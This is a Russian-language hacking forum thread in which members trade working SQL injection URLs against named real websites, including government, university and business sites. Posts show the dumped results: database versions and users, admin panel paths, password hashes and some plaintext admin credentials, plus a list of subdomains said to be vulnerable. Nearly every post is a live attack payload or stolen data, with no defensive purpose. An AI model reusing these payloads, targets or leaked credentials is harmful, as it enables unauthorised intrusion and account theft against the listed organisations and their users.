SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://www.cultura.mt.gov.br/conteudo.php?sid=54&cid=543++union+select+1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+limit+1,1/*
    version():4.1.22-standard-log
    database():MYSDCP02
    user():[email protected]
    __
    Code:
    http://www.stips.minpolj.sr.gov.yu/print.php?sid=2+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6+limit+1,1/*
    version():5.0.44-debug-log
    database():minmiss
    user():minmiss@localhost
    __
    Code:
    http://glastonbury.gov.uk/g_gov/article.php?op=Print&sid=377+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8+limit+1,1/*
    version():5.0.32-Debian_7etch8-log
    database():glastonb
    user():glastonb@localhost
    __
    Code:
    http://www.bushnell.illinois.gov/newsStory.php?NewsID=11%27+union+select+1,2,3,4,5,concat(version(),0x3a,database(),0x3a,user()),7,8,9,10,11,12,13,14/*
    version():4.1.20
    database():ci_bushnell_illinois_gov_-_data
    user():bushnell@localhost
     
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.priefert.com.au/newsDetail.php?ID=-1+union+all+select+0,1,concat_ws(0x3c62723e,version(),user(),database()),3--
    юзер/версия/бд:
    Code:
    [email protected]
    4.1.22-standard
    priefert_products
    -----------------------------------------------------------------------
    Code:
    http://www.viewsonic.com.au/pr/show.php?id=-1+union+all+select+0,1,2,concat_ws(0x3c62723e,user,password,file_priv),4,5,6,7,8+from+mysql.user--
    логин/пасс:
    Code:
    root
    750ce2a25a8d1ad5
    Code:
    file_priv:Y
    Code:
    http://www.viewsonic.com.au/pr/show.php?id=-1+union+all+select+0,1,2,concat_ws(0x3c62723e,user(),version(),database()),4,5,6,7,8+from+mysql.user--
    юзер/версия/бд:

    Code:
    web@localhost  4.1.22-log  vsau
    -----------------------------------------------------------------------
    The End!
     
    4 people like this.
  3. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    http://www.psicodietnews.org/page.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5+from+administrator--
    http://www.psicodietnews.org/admin/admin.php

    Льется шел )
     
    2 people like this.
  4. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    pr5
    Code:
    http://www.menzelinsk.ru/average_special_educational.php?average=999+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--
    tabl:
    a_ad_users(login,pass)
    chelnyclub : club (только одна запись, админку не нашел =( )
    a_nla07_users (login,pass)

    version() 5.0.67-log
    user() [email protected]
    database() u23836


    pr4
    Code:
    http://www.moretonisland.com.au/product.php?id=67764+union+select+1,2,concat_ws(char(32,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    version() 4.0.17
    user() moreton@localhost
    database() moreton



    pr5
    Code:
    http://www.antarvictoria.org.au/local-group.php?id=9999+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+18,1--
    version() 5.0.67
    user() antarvic_l_user@localhost
    database() antarvic_local




    pr4
    Code:
    http://www.qcal.org.au/seminars/event.php?ID=9999+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13--
    version() 4.1.22-standard-log
    user() qca7919_public@localhost
    database() qca7919_QCAL


    pr4
    Code:
    http://www.volzsky.ru/categ.php?id=9999+union+select+1,concat_ws(char(32,32),version(),user(),database())--
    version() 5.1.32-community-log
    user() [email protected]
    database() Wx1000_volzskij

    pr3
    Code:
    http://www.countrywide.net.au/view_distributor.php?id=999+union+select+1,CONCAT( username, CHAR(32,58,32), password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+auth/*&cadellt
    /admin/index.php
    cwdadmin : countrywide1
    version() 4.0.27-standard
    user() country_countryw@localhost
    database() country_countrywide

    pr5
    Code:
    http://www.velikieluki.ru/struc/struc2_d.php?struc2_id=9999+union+select+0,concat_ws(char(32,32),version(),user(),database()),username,%20CHAR(32,58,32),%20user_password),2,3,4,5--
    &struc_id=2
    version() 5.0.27-log
    user() velikieluki@localhost
    database() velikieluki


    и на последок PostgreSQL
    pr5
    Code:
    http://nursing.flinders.edu.au/research/index.php?id=108'+union+select+1,version(),null,null,null,null,null,null,null,null,null,null,null,null--
    version() - PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
    current_user() - nursstaff
    current_database() - nursing
     
    2 people like this.
  5. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.allcolombiangirls.com/detail.php?code=-1+union+select+1,2,concat_ws(0x3a3a,uname,confirmkey),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+signup+limit+21,1--

    Для страждущих. Бабы =)))
     
    1 person likes this.
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://cleveland.dbusinessnews.com/shownews.php?newsid=124409+union+select+unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5,6,7/*&type_news=latest


    Database Version: 4.1.11
    Database name: dbusinessnews_db
    User name: dbnewsdbadmin@localhost


    Уязвимость присутствует во всех этих ресурсах...


    advertising-pr.dbusinessnews.com [66.129.105.20]
    advertising-pr.dbusinessnews.com [66.129.105.20]
    airline.dbusinessnews.com [66.129.105.20]
    airline.dbusinessnews.com [66.129.105.20]
    albany.dbusinessnews.com [66.129.105.20]
    albany.dbusinessnews.com [66.129.105.20]
    anchorage.dbusinessnews.com [66.129.105.20]
    anchorage.dbusinessnews.com [66.129.105.20]
    atlanta.dbusinessnews.com [66.129.105.20]
    atlanta.dbusinessnews.com [66.129.105.20]
    atlanta.triangle.dbusinessnews.com [66.129.105.20]
    atlanta.triangle.dbusinessnews.com [66.129.105.20]
    augusta.dbusinessnews.com [66.129.105.20]
    augusta.dbusinessnews.com [66.129.105.20]
    austin.dbusinessnews.com [66.129.105.20]
    austin.dbusinessnews.com [66.129.105.20]
    automotive.dbusinessnews.com [66.129.105.20]
    automotive.dbusinessnews.com [66.129.105.20]
    baltimore.dbusinessnews.com [66.129.105.20]
    baltimore.dbusinessnews.com [66.129.105.20]
    banking.dbusinessnews.com
    banking.dbusinessnews.com
    billings.dbusinessnews.com
    birmingham.dbusinessnews.com
    birmingham.dbusinessnews.com
    bismarck.dbusinessnews.com
    bismarck.dbusinessnews.com
    boise.dbusinessnews.com
    boise.dbusinessnews.com
    boston.dbusinessnews.com
    boston.dbusinessnews.com
    charleston.dbusinessnews.com
    charleston.dbusinessnews.com
    charlotte.dbusinessnews.com
    charlottte.dbusinessnews.com
    charlottte.dbusinessnews.com
    cheyenne.dbusinessnews.com
    cheyenne.dbusinessnews.com
    chicago.dbusinessnews.com
    chicago.dbusinessnews.com
    cincinnati.dbusinessnews.com
    cincinnati.dbusinessnews.com
    columbia.dbusinessnews.com
    columbia.dbusinessnews.com
    columbus.dbusinessnews.com
    columbus.dbusinessnews.com
    computers.dbusinessnews.com
    computers.dbusinessnews.com
    concord.dbusinessnews.com
    concord.dbusinessnews.com
    crm.dbusinessnews.com
    crm.dbusinessnews.com
    dallas.dbusinessnews.com
    dayton.dbusinessnews.com
    dayton.dbusinessnews.com
    demo.dbusinessnews.com
    demo.dbusinessnews.com
    denver.dbusinessnews.com
    denver.dbusinessnews.com
    desmoines.dbusinessnews.com
    desmoines.dbusinessnews.com
    detroit.dbusinessnews.com
    detroit.dbusinessnews.com
    doston.dbusinessnews.com
    doston.dbusinessnews.com
    education.dbusinessnews.com
    education.dbusinessnews.com
    electronics.dbusinessnews.com
    electronics.dbusinessnews.com
    engineering.dbusinessnews.com
    engineering.dbusinessnews.com
    food-beverage.dbusinessnews.com
    gaming.dbusinessnews.com
    gaming.dbusinessnews.com
    hartford.dbusinessnews.com
    hartford.dbusinessnews.com
    healthcare.dbusinessnews.com
    honolulu.dbusinessnews.com
    honolulu.dbusinessnews.com
    hospitality.dbusinessnews.com
    hospitality.dbusinessnews.com
    houston.dbusinessnews.com
    houston.dbusinessnews.com
    indianapolis.dbusinessnews.com
    indianapolis.dbusinessnews.com
    indianapolis.indianapolis.dbusinessnews.com
    indianapolis.indianapolis.dbusinessnews.com
    information-technology.atlanta.dbusinessnews.com
    information-technology.atlanta.dbusinessnews.com
    internet.dbusinessnews.com
    internet.dbusinessnews.com
    jackson.dbusinessnews.com
    jacksonville.dbusinessnews.com
    jacksonville.dbusinessnews.com
    kansas.dbusinessnews.com
    kansas.dbusinessnews.com
    kansascity.dbusinessnews.com
    kansascity.dbusinessnews.com
    lasvegas.dbusinessnews.com
    lasvegas.dbusinessnews.com
    legal-services.dbusinessnews.com
    legal-services.dbusinessnews.com
    life-sciences.dbusinessnews.com
    life-sciences.dbusinessnews.com
    losangeles.dbusinessnews.com
    losangeles.dbusinessnews.com
    louisville.dbusinessnews.com
    louisville.dbusinessnews.com
    management.dbusinessnews.com
    management.dbusinessnews.com
    manufacturing.dbusinessnews.com
    manufacturing.dbusinessnews.com
    memphis.dbusinessnews.com
    metals-industry.dbusinessnews.com
    metals-industry.dbusinessnews.com
    milwaukee.dbusinessnews.com
    milwaukee.dbusinessnews.com
    minneapolis.dbusinessnews.com
    minneapolis.dbusinessnews.com
    montpelier.dbusinessnews.com
    montpelier.dbusinessnews.com
    nashville.dbusinessnews.com
    nashville.dbusinessnews.com
    newark.dbusinessnews.com
    newark.dbusinessnews.com
    neworleans.dbusinessnews.com
    newyork.dbusinessnews.com
    newyork.dbusinessnews.com
    non-profit-news.dbusinessnews.com
    non-profit-news.dbusinessnews.com
    oklahomacity.dbusinessnews.com
    oklahomacity.dbusinessnews.com
    omaha.dbusinessnews.com
    omaha.dbusinessnews.com
    orangecounty.dbusinessnews.com
    orangecounty.dbusinessnews.com
    orlando.dbusinessnews.com
    orlando.dbusinessnews.com
    pharmaceuticals.dbusinessnews.com
    pharmaceuticals.dbusinessnews.com
    philadelphia.dbusinessnews.com
    philadelphia.dbusinessnews.com
    phoenix.dbusinessnews.com
    phoenix.dbusinessnews.com
    pittsburgh.dbusinessnews.com
    portland.dbusinessnews.com
    portland.dbusinessnews.com
    potomac.dbusinessnews.com
    potomac.dbusinessnews.com
    providence.dbusinessnews.com
    providence.dbusinessnews.com
    real-estate.dbusinessnews.com
    real-estate.dbusinessnews.com
    retail.dbusinessnews.com
    retail.dbusinessnews.com
    richmond.dbusinessnews.com
    richmond.dbusinessnews.com
    sacramento.dbusinessnews.com
    sacramento.dbusinessnews.com
    sales-marketing.dbusinessnews.com
    sales-marketing.dbusinessnews.com
    saltlakecity.dbusinessnews.com
    sanantonio.dbusinessnews.com
    sanantonio.dbusinessnews.com
    sanfran.dbusinessnews.com
    sanfran.dbusinessnews.com
    sanfrancisco.dbusinessnews.com
    sanfrancisco.dbusinessnews.com
    sanjose.dbusinessnews.com
    sanjose.dbusinessnews.com
    seattle.dbusinessnews.com
    seattle.dbusinessnews.com
    software.dbusinessnews.com
    software.dbusinessnews.com
    southflorida.dbusinessnews.com
    southflorida.dbusinessnews.com
    stlouis.dbusinessnews.com
    stlouis.dbusinessnews.com
    tampa.dbusinessnews.com
    tampa.dbusinessnews.com
    telecom-wireless.dbusinessnews.com
    telecom-wireless.dbusinessnews.com
    trade-professional-services.dbusinessnews.com
    trade-professional-services.dbusinessnews.com
    triad.dbusinessnews.com
    triad.dbusinessnews.com
    triangle.atlanta.dbusinessnews.com
    triangle.dbusinessnews.com
    triangle.dbusinessnews.com
    triangle.triangle.dbusinessnews.com
    venture-capital.dbusinessnews.com
    venture-capital.dbusinessnews.com
    wichita.dbusinessnews.com
    wichita.dbusinessnews.com
    wilmington.dbusinessnews.com
    wilmington.dbusinessnews.com
    www.dbusinessnews.com
    www.dbusinessnews.com
     
    #8646 Gorev, 3 Apr 2009
    Last edited: 3 Apr 2009
    5 people like this.
  7. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    http://www.liguegolf-limousin.org/page/page.php?id=-1+union+select+1,2,concat_ws(0x3a,login_utilisateur,pwd_utilisateur),4,5+from+utilisateur--

    http://www.liguegolf-limousin.org/infos_club/login.php
     
  8. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<Ботаника>>

    Code:
    http://www.noviyegrani.com/subjects.php?ID=-223'+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns+where+table_name='_kullanicilar'--+
    db: 5.0.45
    name_db: noviye
    user: noviye@localhost

    log: sinantr
    pass: 46ab172f44d6dfed

    log: kerem37
    pass: 0e5360d8365b0c67

    ----------------------------------
    ----------------------------------
    Code:
    http://www.fontaene-verlag.de/book.php?ID=-20'+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    db: 5.0.45
    name_db: kaynak_verlag2
    user: kulturyabanci@localhost

    --------------------------------
    --------------------------------

    Code:
    http://www.multi-master.ru/service/detail.php?id=-10+union+select+1,2,version(),4,5,6,7,8--+
    db: 4.0.25-standard
    name_db: multi72_base
    user: [email protected]
     
    #8648 farex, 4 Apr 2009
    Last edited: 4 Apr 2009
    1 person likes this.
  9. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.usjf.net/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x3a3a,pn_uname,pn_pass,pn_user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+nuke_users+limit+0,1/*


    Греьаные америкосы...
     
  10. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<Администрация города Орла>>
    Code:
    http://www.orel-adm.ru/index.php?id=-4-3'+union+select+1,unhex(hex(version())),3/*
    db: 4.1.10a-log
    name_db: tbase
    user: utw@localhost
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.physikinstrumente.com/en/news/fullnews.php?newsid=-148+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7


    Version : 4.1.15-Debian_1ubuntu5-log
    Database : pi_temp
    User : pi_temp_admin@localhost
     
  12. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.agencyscams.info/scammer_profile.php?id=-1+union+select+concat_ws(0x3a3a,login,password)+from+users+limit+0,1/*

    Брачное агенцтво =)))
     
    1 person likes this.
  13. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<Электронная библиотека "Custos">>

    Code:
    http://custos.ru/view_all.php?id=-66'+union+select+1,2,concat_ws(0x3a,table_schema,column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name='userlist'+limit+1,1--+
    db: 5.0.67 percona-b5-log
    name_db: custos
    user: custos@localhost
    OS: redhat-linux-gnu

    -=admin=-
    table:wp_user
    db:custos_aliber
    log: admin
    pass: $P$Bk/TSk3K10o50RA8rYCm64aCQouR/ мда :( :( :(
    mail: [email protected]

    -=users=-
    table_name: user_list
    db: custos
    log: custos
    pass: pass!23wo2345$%rd
    Юзвер оказался один... Онже по видемому и админ...
    ---------------------------------------------------
    ---------------------------------------------------
    <<Школа эротического танца"APsara">> :)
    Code:
    http://www.stripdance.com.ua/index.php?id=999+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())--
    db: 5.1.30
    name_db: stripdan_db
    user: stripdan_admin@localhost
    читаем robots.txt
    Code:
    User-agent:
    Disallow:/administrator/
    Disallow: /cache/
    Disallow: /components/
    Disallow: /editor/
    Disallow: /help/
    Disallow: /images/
    Disallow: /includes/
    Disallow: /language/
    Disallow: /mambots/
    Disallow: /media/
    Disallow: /modules/
    Disallow: /templates/
    Disallow: /installation/
    -------------
    http://www.wdance.com.ua/administrator/
    Вас встречает надпись "Добро пожаловать в Joomla!" :)
    -------------
    -=admins=-
    table:user_tab
    type: admin
    log: admin
    pass: 777 :p

    type: admin
    log: jony
    pas: f56d08c116d513a223508f31b53d8186 :(
    -=users=-
    +limit+x,x--+

    :D :D :D
     
    #8653 farex, 4 Apr 2009
    Last edited: 4 Apr 2009
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version())
    soznanie_jest@localhost:soznanie_web14db1:5.0.67-community-log
    Code:
    http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password)+from+phpbb_users+limit+1,1
    admin:$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21
    http://so-znanie.com/forum/index.php
     
  15. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Database Version: 5.0.67-community
    Database name: adventur_adventure
    User name: adventur_adventu@localhost

    Вытаскивать из users


    Database Version: 4.1.22
    Database name: panda
    User name: panda@localhost
     
    #8655 .:[melkiy]:., 4 Apr 2009
    Last edited: 4 Apr 2009
    1 person likes this.
  16. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Hostings

    :D
    version():4
    [​IMG]

    version():4
    [​IMG]
    post методом
    оба поля уязвимы

    version():5.1.32-log
    [​IMG]
    авторизация также уязвима))
     
    3 people like this.
  17. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.jaffnaroyalfamily.org/news.php?id=-41+union+select+1,2,date,version(),5,6,7,8+from+news/*
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.tagderkueche.de/presse/adetails.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6
     
  19. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Job
    Все сайты на серваке Jobовые,версия пятая, доступ ко всем базам =)

    Code:
    http://www.fairylakejobs.net/php/job.php?id=-343989/**/union/**/select/**/1,concat_ws(0x3A3a,user(),version(),database()),3/*
    fljobssi@localhost
    5.0.45
    sql57865_1
     
  20. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Database Version: 5.0.45-Debian_1ubuntu3.3-log
    Database name: staelorg
    User name: [email protected]


    Database Version: 4.1.11-Debian_4sarge8-log
    Database name: nuke
    User name: portal@localhost


    Database Version: 4.0.21-log
    Database name: atlantyd_com
    User name: atlantyd_com@localhost
     
    #8660 .:[melkiy]:., 5 Apr 2009
    Last edited: 5 Apr 2009
Thread Status:
Not open for further replies.